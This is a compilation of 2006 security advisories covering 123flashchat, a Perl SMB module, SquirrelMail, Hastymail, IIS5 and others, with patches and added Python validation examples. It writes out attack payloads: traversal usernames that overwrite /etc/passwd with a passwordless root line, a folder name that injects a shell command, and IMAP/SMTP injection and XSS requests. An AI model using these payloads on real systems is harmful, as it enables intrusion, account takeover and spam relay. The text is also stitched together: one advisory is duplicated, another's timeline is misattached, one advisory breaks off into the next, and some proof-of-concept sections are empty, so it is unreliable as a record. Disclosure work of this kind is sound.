2006-003: Arbitrary flash code remote execution in 123flashchat.
Original release Date: January 12, 2006
Last revised: January 23, 2006
Discovered by: Jesus Olmos Gonzalez
Severity: 4/5
BACKGROUND
123 Flash Chat is a full featured java chat server and flash chat client, the product homepage is www.123flashchat.com and it is possible to test it at:
DESCRIPTION
The flash chat client makes heavy use of the eval statement, and in most cases it is vulnerable because variables that users can change are included in the eval.
If we can write into an eval we can inject code: if our user name contains the ; character, we can write code inside the client.
If it is possible to write code, a cracker can convert his user into an admin by changing his variables. It is also possible to inject into other clients.
Let's look at the vulnerable code:
function openOneAVWindow(username) {
    var i = 0;
    if (i < roomUsers.length) {
        var user = roomUsers[i];
        if (user.name == username) {
            // user.name is concatenated straight into the string that eval executes
            if (eval("_root.avmc_" + user.name) == "")
            // ... (the rest of the function is not included in the advisory)
and this will be executed when a window is opened:
user.name=ADMIN_AVATAR_NAME;
A username containing the " character is not possible, so the ADMIN_AVATAR_NAME constant, whose value is "admin", can be used instead.
PROOF OF CONCEPT
We have not exploited it successfully, but the vulnerability is there.
BUSINESS IMPACT
-
SYSTEMS AFFECTED
This vulnerability affects the 123flashchat server up to 5.1 (released on Dec 22, 2005)
SOLUTION
No patch available yet.
REFERENCES
-
CREDITS
This vulnerability has been discovered and reported by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
January 13, 2006: Initial release.
January 23, 2006: Vendor response updated.
DISCLOSURE TIMELINE
January 04, 2006 The vulnerability discovered by Internet Security Auditors.
January 13, 2006 Initial vendor notification sent.
January 23, 2006 Vendor confirms that this is corrected in v5.1_2 i
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
CREDITS
This vulnerability has been discovered and reported by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
April 18, 2006: Initial release.
November 13, 2007: Last revision.
DISCLOSURE TIMELINE
February 27, 2006: The vulnerability discovered by Internet Security Auditors.
April 18, 2006: Initial vendor notification sent. No response.
April 26, 2006: Second vendor notification sent. Ping pong responses.
September 14, 2006: Third vendor notification sent. No response.
December 01, 2006: Fourth vendor notification sent. No response.
December 04, 2006: New patch coming. No schedule.
January 02, 2007: Fifth vendor contact to ask for planning. No response.
January 22, 2007: Sixth vendor contact to ask for planning. Scheduled.
March 23, 2007: Seventh vendor contact to ask for planning. Re-Scheduled.
May 22, 2007: Eighth vendor contact to ask for planning. Re-Scheduled.
October 01, 2007: Ninth vendor contact to ask for planning. Patch will be published in October.
November 09, 2007: Tenth. Version 48.1.1 has been approved for general release and published.
November 13, 2007: Advisory Published.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-005: strings, dbg and other binutils commands are vulnerable to a Denial of Service.
Original release Date: April 16th, 2006
Last revised: April 26th, 2006
Discovered by: Jesús Olmos González
Severity: 2/5
BACKGROUND
strings and dbg are some of the tools from the binutils package; they can be used to look for printable strings in a binary file and to debug and reverse engineer executables.
A binary file can be protected against the use of strings.
It is possible to build a binary file with some special characters in a variable such that, once compiled, it is impossible to extract the printable strings of the ELF using the strings tool: it will segfault or hang.
(gdb) r evil
Starting program: /usr/bin/strings evil
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xb7e9ecbd in bfd_hash_lookup () from /usr/lib/libbfd-2.16.1.so
(gdb)
The problem is in bfd_hash_lookup from the libbfd-2.16.1.so library, at this snippet of code:
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
or installed:
perl -MCPAN -e shell
install Filesys::SmbClientParser
DESCRIPTION
If a host scans your shared folder with a tool that uses this module, you can execute shell commands on that host.
This module has the following snippet of code:
my @var = `$pargs`;
$pargs is built with the following weak filters:
my $pargs;
if ($args=~/^([^;]*)$/) { # no ';' nickel
    $pargs=$1;
} elsif ($smbscript) { # ';' is allowed inside -c ' '
    if ($args=~/^([^;]* -c '[^']*'[^;]*)$/) {
        $pargs=$1;
    } else { # what that ?
        die("Why a ';' here ? => $args");
    }
} else {
    die("Why a ';' here ? => $args");
}
If there is a folder inside a shared folder with the following name:
' x && xterm &#
Perl will spawn an xterm :) Note that this was reported in 2006 and no answer was received; be careful with CPAN modules.
PROOF OF CONCEPT
This folder name inside the shared folder:
' x && xterm &#
Will execute the following:
/usr/bin/smbclient "//x.x.x.x/vulns" -U "user%pass" -d0 -c 'cd "' x && xterm &#"' -D "/poc"
This proof of concept spawns an xterm on the victim's X display; replace xterm with the evil commands.
BUSINESS IMPACT
-
SYSTEMS AFFECTED
Versions up to 2.7 included (all)
SOLUTION
Use this patch:
138a139,146 > #------------------------------------------------------------------------------ > # Sanitize (jolmos[@]isecauditors[.]com) > #------------------------------------------------------------------------------ > sub Sanitize { > my $danger = $_[0]; #There are many danger bytes, but if the > $$danger =~ s/\n|\r|'|"|//ig; #danger string is inside "" or '' the only > #option is break with ' or " or \r or \n > } 265a274 > foreach my $i (@_) { &Sanitize(\$i); } 287a297 > foreach my $i (@_) { &Sanitize(\$i); } 321a332 > foreach my $i (@_) { &Sanitize(\$i); } 331a343 > foreach my $i (@_) { &Sanitize(\$i); } 345a358 > foreach my $i (@_) { &Sanitize(\$i); } 359a373 > foreach my $i (@_) { &Sanitize(\$i); } 373a388 > foreach my $i (@_) { &Sanitize(\$i); } 375a391 > 387a404 > foreach my $i (@_) { &Sanitize(\$i); } 398a416 > foreach my $i (@_) { &Sanitize(\$i); } 409a428 > foreach my $i (@_) { &Sanitize(\$i); } 487a507 > foreach my $i (@_) { &Sanitize(\$i); }
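Review bot: the new Sanitize sub (hunk 138a139,146) is not a sufficient fix for the backtick call `my @var = `$pargs`;`: it strips only \n, \r, ' and ", yet values the module places between double quotes in the command shown above (`-U "user%pass"`, `-D "/poc"`) still have $ and backtick sequences expanded by the shell, so command substitution survives; its regex `s/\n|\r|'|"|//ig` also carries a trailing empty alternative that matches at every position and should be removed; and silently deleting quote characters changes the folder name the caller asked for instead of rejecting it. Prefer running smbclient without a shell (the list form `open(my $fh, '-|', $cmd, @args)`) and refusing, rather than rewriting, values that contain quotes or line breaks. The `foreach my $i (@_) { &Sanitize(\$i); }` hooks also alias $i to the caller's arguments, so they rewrite the caller's own variables and die with "Modification of a read-only value attempted" whenever a string literal is passed in; copy @_ into a local array before sanitizing.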
CREDITS
This vulnerability has been discovered and reported by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
April 26, 2006: Initial release.
July 14, 2008: Patch added.
DISCLOSURE TIMELINE
February 26, 2006: The vulnerability discovered by Internet Security Auditors.
April 26, 2006: Initial vendor notification sent.
September 14, 2006: Second notification: correction in one week. No correction.
December 2, 2006: Third notification: no response.
January 18, 2007: Fourth notification: no response.
May 1, 2007: Fifth notification: no response.
November 11, 2007: Sixth notification: no response.
July 14, 2008: No response from the developer (Alain Barbet), we wrote the patch.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-007: The BlueSocket web administration is vulnerable to a Cross Site Scripting attack
Original release Date: April 27th, 2006
Last revised: December 1st, 2006
Discovered by: Jesús Olmos González
Severity: 2/5
BACKGROUND
BSC 2100 product is included in the Blue Secure Family (www.bluesocket.com).
BlueSecure Controllers provide high-performance, reliable, policy-based WLAN security and management solutions that have been deployed by hundreds of large institutions, enterprises, and public access providers.
DESCRIPTION
The admin.pl Perl code does not sanitize its inputs, so when it tries to write the username back into the input field, HTML and script code can be written back and executed by the browser.
This cross-site scripting is in the administration interface of the security product; it has been tested only on the BSC 2100.
It is possible to send a fake e-mail to the admin, spoofing the product's address, saying that the configuration is not OK and including the special link.
If the admin clicks the link and logs in through the apparently normal interface, his credentials will be sent to the attacker.
Combined with good social engineering this is a great risk.
PROOF OF CONCEPT
This POC injects some HTML to modify the look and feel of the authentication page, and an attacker could inject script code to send back the credentials:
BUSINESS IMPACT
Credentials could be stolen through social engineering attacks.
SYSTEMS AFFECTED
Versions prior to 5.2, or without 5.1.1-BluePatch
SOLUTION
Update to version 5.2 or apply 5.1.1-BluePatch
REFERENCES
Vulnerability item number 4484 in the Bluepatch V6 for 5.1.1.1 Release Notes.
CREDITS
This vulnerability has been discovered and reported by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
April 27, 2006: Initial vendor contact.
April 28, 2006: Vendor updates its near patch.
June 21, 2006: Publication of the patch.
September 16, 2006: Vendor confirms inclusion in referenced patch.
September 17, 2006: Advisory revised.
DISCLOSURE TIMELINE
April 26, 2006: The vulnerability discovered by Internet Security Auditors (www.isecauditors.com).
December 1, 2006: Advisory finally published.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-010: XSS vulnerability in error page of ISMail
Original release date: September 28, 2006
Last revised: December 1, 2006
Discovered by: Vicente Aguilera Díaz
Severity: 3/5
BACKGROUND
ISMail is a webmail system. Programmed in HTML and PHP, it is designed to work with any imap server.
ISMail requires PHP 4.2+, compiled with IMAP and Session support, to be installed on the server that runs it.
You have a choice of data-store backends (xml, encrypted xml, mysql, and postgresql are included, each requiring their respective PHP modules), and miscellaneous other options that can make the Inside Systems Mail experience a little friendlier.
Unlike most other webmail programs, Inside Systems Mail is both quick and easy to use. The layout, complete with address book and folder options, is simple and familiar to most users.
For administrators, the data-stores and options are easily extensible so that Inside Systems Mail can be dropped in nearly any configuration with minimal extra coding.
DESCRIPTION
The error page "error.php" receives a parameter in the query string that holds the error message to show.
This parameter ("error") can be manipulated by an attacker to inject arbitrary script/HTML code.
This is dangerous because it makes XSS attacks possible to obtain the session cookies of authenticated users and spoof their sessions, or to deface the error page.
BUSINESS IMPACT
An attacker can spoof the session of other authenticated users, gaining access to their mail, or deface the error page.
SYSTEMS AFFECTED
This vulnerability has been tested on the latest version of ISMail (2.0, released on 2005-01-20). Possibly all versions are affected by this vulnerability.
CREDITS
This vulnerability has been discovered and reported by Vicente Aguilera Díaz (vaguilera (at) isecauditors (dot) com).
REVISION HISTORY
September 28, 2006: Initial release.
DISCLOSURE TIMELINE
September 27, 2006 The vulnerability discovered by Internet Security Auditors (www.isecauditors.com).
September 28, 2006 Initial vendor notification sent.
October 1, 2006 The vendor fixed the vulnerability in the repository.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
Original release date: September 28, 2006
Last revised: December 1, 2006
Discovered by: Vicente Aguilera Díaz
Severity: 3/5
BACKGROUND
Hastymail is yet another webmail IMAP client written in PHP. Hastymail is designed for speed, RFC compatibility, simplicity, and security. Our goal is to create a simple interface with powerful but easy to use options that make managing your IMAP account effective and fast.
Hastymail is NOT groupware. We are focused on being a functional and fast webmail client.
DESCRIPTION
Hastymail provides a graphical interface to interact with mail servers across the IMAP/SMTP protocols.
Improper validation of the commands and information transmitted by Hastymail to the mail servers during the normal use of this application (for example, accessing the mailbox) allows an authenticated malicious user to inject arbitrary IMAP/SMTP commands into the mail servers used by Hastymail, through parameters used by the webmail front-end in its communication with these mail servers.
This becomes dangerous because the injection of these commands allows an intruder to evade restrictions imposed at the application level and to exploit vulnerabilities that could exist in the mail servers through IMAP/SMTP commands.
PROOF OF CONCEPT
== IMAP Injection example (1.5 version) =============
When a user sends a message, he creates a POST request like:
POST http://<webserver>/<path_to_hastymail>/html/compose.php HTTP/1.1
...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept
-----------------------------84060780712450133071594948441
...
A malicious user can modify the value of the "subject" parameter and inject any SMTP command.
Example: Relay from a non-existent e-mail address.
...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept
.
mail from: hacker@domain.com
rcpt to: victim@otherdomain.com
data
This is a proof of concept of the SMTP command injection in Hastymail
.
-----------------------------84060780712450133071594948441
...
BUSINESS IMPACT
The IMAP/SMTP command injection allows exploiting vulnerabilities in the IMAP/SMTP servers and evading all the restrictions at the application layer.
SYSTEMS AFFECTED
This vulnerability has been tested in:
Last development version: 1.5, released on February 17, 2006
Last stable version: 1.0.2, August 23, 2004
Possibly all versions are affected by this vulnerability.
CREDITS
This vulnerability has been discovered and reported by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).
REVISION HISTORY
September 28, 2006: Initial release.
October 3, 2006: Project admin response.
October 9, 2006: Project admin publishes the patch for the 1.5 and 1.02 versions.
DISCLOSURE TIMELINE
September 28, 2006: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
December 1, 2006: Advisory published.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-013: Microsoft IIS5 NTLM and Basic authentication bypass
Original release date: December 15, 2006
Last revised: May 22, 2007
Discovered by: Jesus Olmos Gonzalez
Severity: 5/5
BACKGROUND
Microsoft Internet Information Server Web Server can protect the private contents with a basic or NTLM authentication.
Many web pages, intranets and extranets rely on Microsoft security.
DESCRIPTION
IISv5 has a "Hit-highlighting" functionality that opens a site object and highlights some part of it; it has had a traversal vulnerability in the past. Now it can be used to bypass the IIS authentication.
Any Internet user can access the private web directories and files of any IISv5 web site by highlighting them with "Hit-highlighting". To use this functionality the user has to supply the CiWebhitsfile parameter to the null.htw object.
BUSINESS IMPACT
The impact depends on the web contents. Attackers could gain access to all protected documents and ASP code. When an attacker accesses a trusted zone, the probability of getting command execution is higher.
SYSTEMS AFFECTED
Internet Information Services Version 5, any Service Pack.
SOLUTION
Protect the files at the NTFS filesystem level instead of relying on the IIS protection. Microsoft recommends not using IISv5.
CREDITS
This vulnerability has been discovered and reported by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
December 15, 2006: Initial release
March 19, 2007: Latest revision
March 27, 2007: First notification to the vendor. Response: under revision.
April 11, 2007: The vendor considers little changes in their KB.
April 12, 2007: We accept it and propose adding comments about the severity of the problem. Rejected.
May 21, 2007: Published, as the vendor information is not detailed enough.
DISCLOSURE TIMELINE
December 15, 2006: Vulnerability acquired by Jesus Olmos Gonzalez (Internet Security Auditors)
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
Advisories 2006
2006-001: Arbitrary remote file creation in 123flashchat server.
Original release date: January 09, 2006
Last revised: January 13, 2006
Discovered by: Jesus Olmos Gonzalez
Severity: 4/5
BACKGROUND
123 Flash Chat is a full featured java chat server and flash chat client, the product homepage is www.123flashchat.com and it is possible to test it at:
DESCRIPTION
The chat server has a user-register functionality, that can be enabled by the following sentence:
in /server/etc/groups/default.xml
By default it is enabled and anybody can create a chat account.
The register form asks the following questions:
username, password, repeat-password and email.
When a user creates an account, a file is created in the members directory:
The user file has the following structure:
^@^B^@^<username>^@^V<password>^@^E<email>
or
^@^B^@^<username>^@^V<password>^@^@
field        size  allow null  parse                     example
username     32    no          (allow transversal ../)   ../room_1.txt
password     32    no          allow all                 123
repeat-pass  32    no          allow all                 123
email        128   yes         /^.+@.+\..+$/aa           a@b.c
The username field allows anybody to create a file on our system, with the same privileges as the server and almost arbitrary content.
This is dangerous because a user can get other users' accounts, erase logs, modify the server's /etc/passwd or modify other config files.
PROOF OF CONCEPT
In the exploitation, there are two factors, WHERE and WHAT.
The username vector is WHERE, and WHAT can be:
1) password
2) email address if we need more bytes
Possible attacks:
../../../../logs/access.log erase logs.
../../../../logs/error.log erase logs.
../default/logs/access.log erase logs.
../members/parker change parker's password; if we now log in as the parker user, he will be disconnected.
../../../../../../../etc/passwd if server run as root.
../../../../etc/ssh/sshd.conf if server run as root.
../../../../../var/log/messages if server run as root.
../../../../var/www/htdocs/x.php try to build a shell.
../../../etc/groups/default.xml create an admin account or change other config settings.
../../../fcserver.sh try to replace the script.
etc...
It is possible to replace existing files, to cause a DoS, to erase logs, to create/change system accounts, to get other chat user/admin accounts or to cause other effects on the server's system.
*Possible* remote execution if some config file is modified.
It is possible to hijack and modify the raw command, injecting line feeds (0x0a) or other characters to construct arbitrary content for the created/overwritten file.
Example:
<Register email="" passwd="(0x0a)root::0:0:root:/bin/bash(0x0a)"
user="../../../../../../../etc/passwd" />(0x0a)
/etc/passwd will be:
root::0:0:root:/bin/bash
\0\0
If the server is Windows, it is possible to get execution.
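The server-side checks that would close the two weaknesses just described (the username used verbatim as a file name, and raw control bytes reshaping the stored record), written here as an added Python example that is not 123flashchat's code; the members directory, the username character set and the record layout are assumptions, while the field sizes are those of the advisory's table.

```python
"""Input checks for a registration handler that stores each member in
<members_dir>/<username>, the pattern the 123flashchat advisory above
describes.  Added example, not the product's code: the members directory,
the username character set and the record layout are assumptions; the
field sizes are those of the advisory's table."""
import re
from pathlib import Path
from typing import Optional

# A username must be a plain file-name token: no separators, no dots.
USERNAME_RE = re.compile(r"[A-Za-z0-9_-]{1,32}")
FIELD_LIMITS = {"username": 32, "password": 32, "email": 128}
# Bytes the advisory injects to reshape the stored record (0x0a) and the
# NUL separators the record format itself uses.
FORBIDDEN = {"\x00", "\r", "\n"}


def valid_username(username: str) -> bool:
    """Whitelist check; fullmatch refuses a trailing newline that '$' would accept."""
    return USERNAME_RE.fullmatch(username) is not None


def member_file_path(members_dir: str, username: str) -> Optional[Path]:
    """Resolve the target file and keep it only if it is still inside
    members_dir.  This catches every traversal the advisory lists, but not
    a name like '../members/parker' that lands back inside the directory,
    which is why valid_username() is applied as well."""
    base = Path(members_dir).resolve()
    target = (base / username).resolve()
    try:
        target.relative_to(base)
    except ValueError:
        return None
    return None if target == base else target


def valid_field(name: str, value: str) -> bool:
    """Enforce the field size and refuse control bytes; rejecting is
    preferred to stripping so the stored record equals what was validated."""
    if len(value) > FIELD_LIMITS[name]:
        return False
    return not FORBIDDEN.intersection(value)


def accept_registration(members_dir: str, username: str,
                        password: str, email: str) -> bool:
    """All checks must pass before a member file is written."""
    return (valid_username(username)
            and member_file_path(members_dir, username) is not None
            and valid_field("password", password)
            and valid_field("email", email))
```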
BUSINESS IMPACT
The chat service can be crashed or compromised remotely.
SYSTEMS AFFECTED
This vulnerability affects the 123flashchat server up to 5.1 (released on Dec 22, 2005)
tested at:
123flashchat server 5.1
123flashchat server 5.0
SOLUTION
Upgrade to newer version.
REFERENCES
-
CREDITS
This vulnerability has been discovered and reported by
Jesús Olmos González (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
January 09, 2006: Initial release.
January 13, 2006: Vendor response actualization.
DISCLOSURE TIMELINE
January 04, 2006 The vulnerability discovered by Internet Security Auditors (www.isecauditors.com)
January 09, 2006 Initial vendor notification sent.
January 10, 2006 Quick response, Version 5.1_2 was released.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-002: IMAP/SMTP Command Injection in SquirrelMail
Original release date: January 12, 2006
Last revised: February 27, 2006
Discovered by: Vicente Aguilera Díaz
Severity: 4/5
BACKGROUND
SquirrelMail is a standards-based webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation.
The product homepage is http://www.squirrelmail.org.
DESCRIPTION
SquirrelMail provides a graphical interface to interact with mail servers across the IMAP and SMTP protocols.
Improper validation of the commands and information transmitted by SquirrelMail to the mail servers during the normal use of this application (mailbox management, e-mail reading and sending, etc.) allows an authenticated malicious user to inject arbitrary IMAP/SMTP commands into the mail servers used by SquirrelMail, through parameters used by the webmail front-end in its communication with these mail servers.
This becomes dangerous because the injection of these commands allows an intruder to evade restrictions imposed at the application level and to exploit vulnerabilities that could exist in the mail servers through IMAP/SMTP commands.
PROOF OF CONCEPT
IMAP example
SquirrelMail Vulnerable parameter: "passed_id" (and possibly others)
When a user clicks on the subject of an e-mail, he creates a GET request such as:
http://<victim>/src/read_body.php?mailbox=INBOX&passed_id=1&startMessage=1&show_more=0
A malicious user can modify the value of the "passed_id" parameter and inject any IMAP command.
Example:
Injection of the CAPABILITY IMAP command across the "passed_id" parameter:
http://<victim>/src/read_body.php?mailbox=INBOX&passed_id=
1%20BODY[1]%0D%0AZ900%20CAPABILITY%0D%0AZ901%20CAPABILITY%0D%
0AZ902%20FETCH%201&startMessage=1&show_more=0
The page returned by the web server shows the result of the CAPABILITY command.
Example:
Z900 OK CAPABILITY completed
* CAPABILITY IMAP4rev1 CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA ACL ACL2=UNION
Z901 OK CAPABILITY completed
SMTP example
SquirrelMail Vulnerable parameter: "subject" (and possibly others)
When a user sends a message, he creates a POST request like:
POST http://<victim>/src/compose.php HTTP/1.1
...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept
-----------------------------84060780712450133071594948441
...
A malicious user can modify the value of the "subject" parameter and inject any SMTP command.
Example:
Relay from a non-existent e-mail address
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept
.
mail from: hacker@domain.com
rcpt to: victim@otherdomain.com
data
This is a proof of concept of the SMTP command injection in SquirrelMail
.
-----------------------------84060780712450133071594948441
...
BUSINESS IMPACT
The IMAP/SMTP command injection allows spam, relaying, exploitation of IMAP and SMTP vulnerabilities in the mail servers, and evasion of all restrictions at the application layer.
SYSTEMS AFFECTED
IMAP Injection: All versions prior to 1.4.6.
SMTP Injection: SquirrelMail 1.2.7 (and older versions).
SOLUTION
Strip \r and \n from $mailbox in the function sqimap_mailbox_select.
Patch available: http://www.squirrelmail.org/security/issue/2006-02-15
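The fix above is a one-line change in sqimap_mailbox_select; the following is an added example of the same server-side handling written in Python, not SquirrelMail code. It strips CR and LF from a mailbox name before quoting it as an RFC 3501 string, accepts passed_id only as a message number, and applies the same CR/LF rule to an SMTP header value, so that one request can never turn into several IMAP or SMTP lines. The tag names and sample values are constructed for the example.

```python
import re

# Added example, not SquirrelMail code: the server-side handling the fix
# describes, applied before a parameter is embedded in an IMAP/SMTP line.
CRLF = re.compile(r"[\r\n]")


def strip_crlf(value: str) -> str:
    """Remove every CR and LF, as the fix does for $mailbox."""
    return CRLF.sub("", value)


def validate_passed_id(value: str) -> int:
    """passed_id is a message sequence number: digits only, nothing else.
    Rejecting is preferable to stripping here, since a non-numeric value can
    only come from a tampered request."""
    if not re.fullmatch(r"[1-9][0-9]*", value):
        raise ValueError(f"passed_id is not a message number: {value!r}")
    return int(value)


def imap_quoted(mailbox: str) -> str:
    """RFC 3501 quoted string: CR/LF removed, backslash and '"' escaped."""
    clean = strip_crlf(mailbox)
    return '"' + clean.replace("\\", "\\\\").replace('"', '\\"') + '"'


def build_select(tag: str, mailbox: str) -> str:
    """One SELECT line, however hostile the mailbox name was."""
    return f"{tag} SELECT {imap_quoted(mailbox)}\r\n"


def build_fetch(tag: str, passed_id: str) -> str:
    """One FETCH line; raises if passed_id is not a message number."""
    return f"{tag} FETCH {validate_passed_id(passed_id)} BODY[1]\r\n"


def smtp_header(name: str, value: str) -> str:
    """A header value must never carry a bare CR/LF: that is what lets a
    subject end the headers and start a new SMTP command."""
    return f"{name}: {strip_crlf(value)}\r\n"


def command_count(wire: str) -> int:
    """Number of lines that would reach the server from one built command."""
    return wire.count("\r\n")


def rejects(value: str) -> bool:
    """True when validate_passed_id refuses the value."""
    try:
        validate_passed_id(value)
    except ValueError:
        return True
    return False
```

The two defences are deliberately different: a structural value such as passed_id is rejected outright, while a free-text value such as a mailbox name or a subject is sanitised, because a user may legitimately type almost anything there except a line break.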
REFERENCES
- http://www.squirrelmail.org/security/issue/2006-02-15
- CVE-2006-0377
CREDITS
This vulnerability has been discovered and reported by Vicente Aguilera Diaz (vaguilera=at=isecauditors=dot=com).
REVISION HISTORY
January 12, 2006: Initial release
January 20, 2006: Disclosure timeline updated
February 16, 2006: Disclosure timeline updated
February 27, 2006: Disclosure timeline updated
DISCLOSURE TIMELINE
December, 2005 Vulnerability acquired by Vicente Aguilera Diaz (Internet Security Auditors)
January 12, 2006 Initial vendor notification sent.
January 19, 2006 The vulnerability is fixed in 1.4.6 cvs and 1.5.1 cvs.
February 15, 2006 The vendor published the vulnerability in the security section.
February 25, 2006 CVE-2006-0377 is updated.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-003: Arbitrary flash code remote execution in 123flashchat.
Original release Date: January 12, 2006
Last revised: January 23, 2006
Discovered by: Jesus Olmos Gonzalez
Severity: 4/5
BACKGROUND
123 Flash Chat is a full-featured Java chat server and Flash chat client; the product homepage is www.123flashchat.com and it can be tested at:
http://host10.123flaschat.com/123flaschat.swf
http://www.123flashchat.com/123flashchat.swf
DESCRIPTION
The Flash chat client makes heavy use of the eval statement; in most cases this is vulnerable because variables are included in the eval and users can change their values.
If we can write into an eval, we can inject code: if our user name contains the character ; we can write code inside the client.
If it is possible to write code, a cracker can convert his user into an admin by changing his variables. It is also possible to inject into other
clients.
Let's see the vulnerable code:
    var i = 0;
    if (i < roomUsers.length) {
        var user = roomUsers[i];
        if (user.name == username)
        {
            if (eval("_root.avmc_" + user.name) == "")
if our username is:
the eval will be:
and this will be executed when a window is opened:
A username containing the " character is not possible, but it is possible to use the ADMIN_AVATAR_NAME constant, whose value is "admin".
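The defect is that the user name becomes part of the expression text that eval sees. As an added example, not the 123flashchat client code, here is a Python stand-in for eval("_root.avmc_" + user.name) next to a lookup that treats the name as a dictionary key; the injection shape differs from the ActionScript one (Python's eval takes an expression, so the example uses "or" rather than ";"), but the mechanism is the same. The username policy in USERNAME_RE and the avatar values are assumptions for the example.

```python
import re

# Added example, not the 123flashchat client code: a Python stand-in for
# eval("_root.avmc_" + user.name), beside a lookup that never evaluates
# the user name. USERNAME_RE is an assumed policy, not the product's.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def avatar_lookup_unsafe(user_name, scope):
    """The user name is spliced into the expression text, so anything that
    is valid expression syntax after 'avmc_' is evaluated."""
    return eval("avmc_" + user_name, {"__builtins__": {}}, scope)


def avatar_lookup_safe(user_name, scope):
    """The user name is data: validated, then used only as a dictionary key."""
    if not USERNAME_RE.match(user_name):
        raise ValueError(f"rejected user name: {user_name!r}")
    return scope.get("avmc_" + user_name, "")


def demo():
    """Returns (unsafe_result, calls_made, safe_result, safe_rejected).

    The admin avatar is the empty string, which is exactly the value the
    client compares against with == "": an empty value is falsy, so an
    'or' spliced in after it hands control to whatever follows."""
    calls = []
    scope = {
        "avmc_admin": "",
        "avmc_alice": "hat.swf",
        # stands in for code an attacker wants to run; records that it ran
        "record": lambda: calls.append("record() ran") or "injected",
    }
    unsafe = avatar_lookup_unsafe("admin or record()", scope)
    safe = avatar_lookup_safe("alice", scope)
    try:
        avatar_lookup_safe("admin or record()", scope)
        rejected = False
    except ValueError:
        rejected = True
    return unsafe, calls, safe, rejected
```

The safe version does two independent things: it validates the name against an allow-list, and it never builds code from it. The second is the one that matters; the first only limits the damage if some other path still reaches an eval.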
PROOF OF CONCEPT
We have not exploited this successfully, but the vulnerability is there.
BUSINESS IMPACT
-
SYSTEMS AFFECTED
This vulnerability affects the 123flashchat server up to 5.1 (released on Dec 22, 2005)
SOLUTION
No patch available yet.
REFERENCES
-
CREDITS
This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
January 13, 2006: Initial release.
January 23, 2006: Vendor response updated.
DISCLOSURE TIMELINE
January 04, 2006 The vulnerability discovered by Internet Security Auditors.
January 13, 2006 Initial vendor notification sent.
January 23, 2006 Vendor confirms that this is corrected in v5.1_2 i
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-004: Vtls.web.gateway cgi is vulnerable to a Cross Site Scripting attack.
Original release Date: April 18th, 2006
Last revised: November 13, 2007
Discovered by: Jesús Olmos González
Severity: 1/5
BACKGROUND
vtls.web.gateway cgi is a product from Visionary Technology in Library Solutions.
http://www.vtls.com
DESCRIPTION
Vtls.web.gateway cgi is vulnerable to a Cross Site Scripting attack. A malicious link could be used to steal user sessions.
PROOF OF CONCEPT
It is possible to execute HTML and JavaScript in the browser of whoever clicks on a link like this:
http://somevtlsweb.net/cgi-bin/vtls/vtls.web.gateway?authority=1&searcht...
%22%3E%3Ch1%3E%3Cmarquee%3EXSS%20bug%3C/marquee%3E%3C/h1%3E%3C!--&
kind=ns&conf=080104+++++++
BUSINESS IMPACT
-
SYSTEMS AFFECTED
All versions of this solution up to 48.1.0
SOLUTION
Update to Version 48.1.1
REFERENCES
www.vtls.com
CREDITS
This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
April 18, 2006: Initial release.
